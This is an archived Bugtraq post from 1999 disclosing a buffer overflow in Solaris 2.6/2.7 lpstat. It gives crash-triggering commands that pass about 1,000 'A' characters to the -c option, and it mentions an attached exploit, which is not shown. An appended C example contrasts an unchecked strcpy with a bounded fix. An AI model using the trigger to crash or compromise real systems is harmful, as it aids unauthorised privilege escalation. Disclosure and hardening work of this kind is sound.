Bugtraq mailing list archives

Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat


From: plasmoid () PIMMEL COM (plasmoid deep/thc/clb)
Date: Tue, 26 Jan 1999 15:02:47 +0000



On Aug/25/98 Sun released the following patches for lp:

 Solaris2.6 Sparc: 106235-02
 Solaris2.6 x86:   106236

It is quite sad that they did not fix another overflow in
/usr/bin/lpstat. I verified this bug on both Solaris 2.7 x86
and 2.6 Sparc; I assume that it is also present on Solaris 2.6
x86 and 2.7 Sparc.

Solaris 2.7 x86
% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class
                    [...]
%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
%                   not exist.
%           TO FIX: Use the "lpstat -c all" command to list
%                   all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc
% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class
                    [...]
%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
%                   exist.
%          TO FIX: Use the "lpstat -c all" command to list
%                  all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitely exploitable; I attached the exploit for
Solaris x86. Quality patches for all Solaris versions can be obtained
from www.hert.org, a fast security source.

plasmoid deep/thc/clb
http://thc.inferno.tusculum.edu
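The crash shown above is consistent with a class name from the command line being copied into a fixed-size buffer before the error message is printed, with no length check. The C example below is added here and is not part of the original post or of Sun's lpstat source: it shows that pattern as a hypothetical function next to a bounded version, with a self-check that feeds a 998-byte name (the length used in the post) through the hardened path. The buffer size, function names and error-text layout are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CLASS_BUF 256   /* constructed size; not lpstat's real buffer size */

/* Pattern that produces a crash like the one in the post: an argument
 * under the caller's control is copied into a fixed-size stack buffer
 * with no length check. Hypothetical code, not Sun's lpstat source.
 * Never called here; kept only for comparison with the safe version. */
void report_unknown_class_unsafe(const char *class_name)
{
    char buf[CLASS_BUF];
    strcpy(buf, class_name);   /* writes past buf when strlen(class_name) >= CLASS_BUF */
    fprintf(stderr, "UX:lpstat: ERROR: Class \"%s\" does not exist.\n", buf);
}

/* Hardened form: bounded copy into a caller-supplied buffer, explicit
 * truncation marker, and a return value the caller can use to reject
 * over-long names outright. Returns 1 if the name was truncated, else 0. */
int report_unknown_class_safe(const char *class_name, char *out, size_t out_len)
{
    size_t n = strlen(class_name);
    int truncated = n >= out_len;
    /* snprintf never writes more than out_len bytes and always NUL-terminates
     * when out_len > 0, so the copy is bounded regardless of input length. */
    snprintf(out, out_len, "%s", class_name);
    fprintf(stderr, "UX:lpstat: ERROR: Class \"%s%s\" does not exist.\n",
            out, truncated ? "..." : "");
    return truncated;
}

/* Self-check: builds a constructed name of name_len 'A' bytes, runs it
 * through the hardened path and returns 1 if the output stayed within
 * CLASS_BUF and was NUL-terminated with the expected length, 0 otherwise. */
int check_long_name(size_t name_len)
{
    char name[1024];
    char out[CLASS_BUF];

    if (name_len >= sizeof name)
        return 0;
    memset(name, 'A', name_len);
    name[name_len] = '\0';

    int truncated = report_unknown_class_safe(name, out, sizeof out);
    int expect_trunc = name_len >= CLASS_BUF;
    size_t expect_len = expect_trunc ? CLASS_BUF - 1 : name_len;

    return truncated == expect_trunc && strlen(out) == expect_len;
}

int main(void)
{
    /* 998 bytes is the argument length used in the post's x86 transcript. */
    printf("998-byte class name handled safely: %s\n",
           check_long_name(998) ? "yes" : "no");
    return 0;
}
```

The point of the return value is that the caller can treat an over-long class name as invalid input and stop, rather than merely printing a truncated message; the bounded copy alone already removes the memory-corruption condition.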


